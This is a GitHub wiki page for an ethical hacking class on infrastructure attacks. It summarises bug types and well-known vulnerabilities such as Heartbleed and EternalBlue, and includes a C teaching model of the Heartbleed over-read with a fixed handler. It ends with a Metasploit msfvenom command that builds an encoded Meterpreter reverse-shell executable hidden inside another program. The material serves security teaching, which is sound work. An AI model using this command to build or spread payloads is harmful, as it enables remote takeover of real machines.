Class 6 Infrastructure Attacks - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

Class 6: Infrastructure Attacks

Vulnerability vs Exploit vs Payload

Searchsploit

SMB-Login Hack

Software Bugs:

  • Buffer overflow
  • Race condition
  • Access violation
  • Infinite loop
  • Division by zero
  • Off-by-one error
  • Null pointer de-reference
  • Input validation error
  • Resource leak

Vulnerabilities:

BlueKeep

BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affected all Linux-based operating systems, including Android devices, that used older versions of the Linux kernel created before 2018. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. Computers and devices that still use the older kernels remain vulnerable.

Heartbleed

Heartbleed was a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed could be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It resulted from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension; the bug's name is thus derived from "heartbeat". The vulnerability was classified as a buffer over-read, a situation where more data can be read than should be allowed.
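As an added illustration of the missing bounds check described above (this is a teaching model written for this page, not code from the class wiki or from OpenSSL), the C snippet below models a heartbeat record as type(1) | length(2) | payload | padding(16), shows the handler that trusts the length field beside the corrected one, and runs both over a constructed memory image in which unrelated data sits just past the record:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Model of a TLS heartbeat record: type(1) | payload_len(2, big-endian) | payload | padding(16). */
#define HB_HEADER   3
#define HB_PADDING  16

/* Constructed memory image (not real OpenSSL data): a 21-byte record whose 2-byte
 * payload "hi" is declared as 0x0040 = 64 bytes, followed by unrelated data that
 * happens to sit beyond the record in memory. The array is zero-filled past the literal. */
static const unsigned char image[128] =
    "\x01" "\x00" "\x40" "hi" "PPPPPPPPPPPPPPPP" "SECRET-KEY-MATERIAL";
#define IMAGE_RECORD_LEN (HB_HEADER + 2 + HB_PADDING)   /* 21 bytes actually received */

static size_t claimed_len(const unsigned char *rec) {
    return ((size_t)rec[1] << 8) | rec[2];
}

/* Vulnerable handler: trusts the length field and never compares it with the
 * number of bytes actually received, so it copies whatever follows the record.
 * out_cap only keeps this demo inside the image; the real bug sized the response
 * from the claimed length and could return up to 64 KiB of process memory. */
size_t heartbeat_vulnerable(const unsigned char *rec, size_t rec_len,
                            unsigned char *out, size_t out_cap) {
    (void)rec_len;                         /* the missing bounds check */
    size_t n = claimed_len(rec);
    if (n > out_cap) n = out_cap;
    memcpy(out, rec + HB_HEADER, n);
    return n;
}

/* Hardened handler (same shape as the OpenSSL 1.0.1g fix): reject any record
 * whose header + claimed payload + padding does not fit in the bytes received. */
size_t heartbeat_fixed(const unsigned char *rec, size_t rec_len,
                       unsigned char *out, size_t out_cap) {
    if (rec_len < HB_HEADER) return 0;
    size_t n = claimed_len(rec);
    if (HB_HEADER + n + HB_PADDING > rec_len) return 0;   /* over-read rejected */
    if (n > out_cap) return 0;
    memcpy(out, rec + HB_HEADER, n);
    return n;
}

int main(void) {
    unsigned char out[128];
    size_t n = heartbeat_vulnerable(image, IMAGE_RECORD_LEN, out, sizeof out);
    printf("vulnerable: returned %zu bytes, tail = %.19s\n", n, out + 2 + HB_PADDING);
    n = heartbeat_fixed(image, IMAGE_RECORD_LEN, out, sizeof out);
    printf("fixed: returned %zu bytes (0 = request rejected)\n", n);
    return 0;
}
```

The vulnerable handler returns the 64 claimed bytes, the last of which are the "SECRET-KEY-MATERIAL" that was never part of the request; the fixed handler rejects the same record and still answers an honest one whose length field matches.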

EternalBlue

EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE-2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to remotely execute code on the target computer.

Exploit Frameworks

Metasploit

Command

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x Bsadware.exe